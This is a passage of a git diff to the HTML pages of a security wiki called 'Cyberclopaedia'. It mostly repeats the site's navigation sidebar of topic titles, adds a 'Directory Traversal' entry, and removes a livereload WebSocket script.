      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -193,22 +193,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Enumeration/Linux/index.html b/docs/Post Exploitation/Enumeration/Linux/index.html index 658f8521..7f7a12ef 100644 --- a/docs/Post Exploitation/Enumeration/Linux/index.html +++ b/docs/Post Exploitation/Enumeration/Linux/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -218,22 +218,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Enumeration/Windows/System Enumeration.html b/docs/Post Exploitation/Enumeration/Windows/System Enumeration.html index ffd2724a..111d4b89 100644 --- a/docs/Post Exploitation/Enumeration/Windows/System Enumeration.html +++ b/docs/Post Exploitation/Enumeration/Windows/System Enumeration.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
